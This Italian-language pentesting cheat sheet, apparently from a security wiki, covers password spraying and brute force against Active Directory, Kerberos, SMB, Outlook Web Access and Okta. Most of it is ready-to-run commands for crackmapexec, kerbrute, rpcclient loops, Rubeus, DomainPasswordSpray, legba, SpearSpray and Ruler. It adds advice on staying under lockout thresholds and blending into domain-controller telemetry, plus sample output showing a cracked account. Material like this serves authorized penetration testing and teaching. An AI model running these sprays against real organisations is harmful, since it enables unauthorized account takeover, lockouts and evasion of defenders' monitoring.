Password Spraying / Brute Force

Reading time: 8 minutes

Password Spraying

Una volta trovati diversi username validi puoi provare le password più comuni (tieni presente la password policy dell'ambiente) con ciascuno degli utenti scoperti.\ Per default la lunghezza minima della password è 7.

Lists of common usernames could also be useful: https://github.com/insidetrust/statistically-likely-usernames

Nota che potresti bloccare alcuni account se provi diverse password sbagliate (di default più di 10).

Ottenere la password policy

Se hai delle credenziali utente o una shell come domain user puoi ottenere la password policy con:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Sfruttamento da Linux (o qualsiasi sistema)

• Usando crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

• Usando kerbrute (Go)

# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

• spray (puoi indicare il numero di tentativi per evitare lockouts):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

• Usando kerbrute (python) - NON RACCOMANDATO — A VOLTE NON FUNZIONA

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

• Con il modulo scanner/smb/smb_login di Metasploit:

• Usando rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Da Windows

• Con la versione di Rubeus con brute module:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

• Con Invoke-DomainPasswordSpray (Può generare automaticamente gli utenti dal dominio e recupera la password policy dal dominio, limitando i tentativi in base a essa):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose

• Con Invoke-SprayEmptyPassword.ps1

Invoke-SprayEmptyPassword

Brute Force

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Kerberos pre-auth spraying with LDAP targeting and PSO-aware throttling (SpearSpray)

Kerberos pre-auth–based spraying riduce il rumore rispetto a SMB/NTLM/LDAP bind attempts e si allinea meglio con AD lockout policies. SpearSpray unisce LDAP-driven targeting, un motore di pattern e awareness delle policy (domain policy + PSOs + badPwdCount buffer) per sprayare in modo preciso e sicuro. Può anche taggare i principals compromessi in Neo4j per BloodHound pathing.

Concetti chiave:

• Scoperta degli utenti via LDAP con paginazione e supporto LDAPS, opzionalmente usando filtri LDAP personalizzati.
• Domain lockout policy + PSO-aware filtering per lasciare un buffer configurabile di tentativi (threshold) e evitare di bloccare gli utenti.
• Kerberos pre-auth validation usando binding gssapi veloci (genera 4768/4771 sui DCs invece di 4625).
• Generazione di password per utente basata su pattern usando variabili come nomi e valori temporali derivati da pwdLastSet di ogni utente.
• Controllo del throughput con threads, jitter e max requests per second.
• Integrazione opzionale con Neo4j per marcare owned users per BloodHound.

Uso base e scoperta:

# List available pattern variables
spearspray -l

# Basic run (LDAP bind over TCP/389)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local

# LDAPS (TCP/636)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local --ssl

Targeting e controllo dei pattern:

# Custom LDAP filter (e.g., target specific OU/attributes)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local \
-q "(&(objectCategory=person)(objectClass=user)(department=IT))"

# Use separators/suffixes and an org token consumed by patterns via {separator}/{suffix}/{extra}
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -sep @-_ -suf !? -x ACME

Controlli di stealth e sicurezza:

# Control concurrency, add jitter, and cap request rate
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -t 5 -j 3,5 --max-rps 10

# Leave N attempts in reserve before lockout (default threshold: 2)
spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -thr 2

Neo4j/BloodHound arricchimento:

spearspray -u pentester -p Password123 -d fabrikam.local -dc dc01.fabrikam.local -nu neo4j -np bloodhound --uri bolt://localhost:7687

Panoramica del sistema dei pattern (patterns.txt):

# Example templates consuming per-user attributes and temporal context
{name}{separator}{year}{suffix}
{month_en}{separator}{short_year}{suffix}
{season_en}{separator}{year}{suffix}
{samaccountname}
{extra}{separator}{year}{suffix}

Available variables include:

• {name}, {samaccountname}
• Temporal from each user’s pwdLastSet (or whenCreated): {year}, {short_year}, {month_number}, {month_en}, {season_en}
• Composition helpers and org token: {separator}, {suffix}, {extra}

Operational notes:

• Favor querying the PDC-emulator with -dc to read the most authoritative badPwdCount and policy-related info.
• badPwdCount resets are triggered on the next attempt after the observation window; use threshold and timing to stay safe.
• Kerberos pre-auth attempts surface as 4768/4771 in DC telemetry; use jitter and rate-limiting to blend in.

Suggerimento: SpearSpray’s default LDAP page size is 200; adjust with -lps as needed.

Outlook Web Access

Ci sono diversi strumenti per password spraying outlook.

• Con MSF Owa_login
• Con MSF Owa_ews_login
• Con Ruler (affidabile!)
• Con DomainPasswordSpray (Powershell)
• Con MailSniper (Powershell)

Per usare uno qualsiasi di questi strumenti, ti serve una lista di utenti e una password / una piccola lista di password da spray.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

• https://github.com/ustayready/CredKing/blob/master/credking.py

Okta

• https://github.com/ustayready/CredKing/blob/master/credking.py
• https://github.com/Rhynorater/Okta-Password-Sprayer
• https://github.com/knavesec/CredMaster

Riferimenti

• https://github.com/sikumy/spearspray
• https://github.com/TarlogicSecurity/kerbrute
• https://github.com/Greenwolf/Spray
• https://github.com/Hackndo/sprayhound
• https://github.com/login-securite/conpass
• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-password-spraying
• https://www.ired.team/offensive-security/initial-access/password-spraying-outlook-web-access-remote-shell
• www.blackhillsinfosec.com/?p=5296
• https://hunter2.gitbook.io/darthsidious/initial-access/password-spraying